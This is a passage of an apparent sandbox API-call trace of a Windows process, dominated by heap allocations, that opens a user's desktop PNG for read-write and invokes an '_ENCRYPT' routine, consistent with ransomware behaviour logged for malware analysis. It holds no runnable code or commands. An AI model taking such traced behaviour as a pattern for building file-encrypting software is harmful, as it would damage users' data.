0x7b13c8 [0030.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x936008 [0030.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0030.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x43) returned 0x88e138 [0030.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png", cchWideChar=67, lpMultiByteStr=0x88e138, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png", lpUsedDefaultChar=0x0) returned 67 [0030.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0030.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.820] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\dq5ap.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x936008, cbMultiByte=67, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x86) returned 0x7bbc00 [0030.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x936008, cbMultiByte=67, lpWideCharStr=0x7bbc00, cchWideChar=67 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png") returned 67 [0030.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0030.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7bbc00 | out: hHeap=0x770000) returned 1 [0030.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x936008 | out: hHeap=0x770000) returned 1 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0030.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.823] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0030.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0030.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.824] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0030.824] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.833] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.833] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889c10 [0030.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.834] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0030.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.834] CloseHandle (hObject=0x140) returned 1 [0030.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.834] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.835] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.835] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.835] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.835] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, 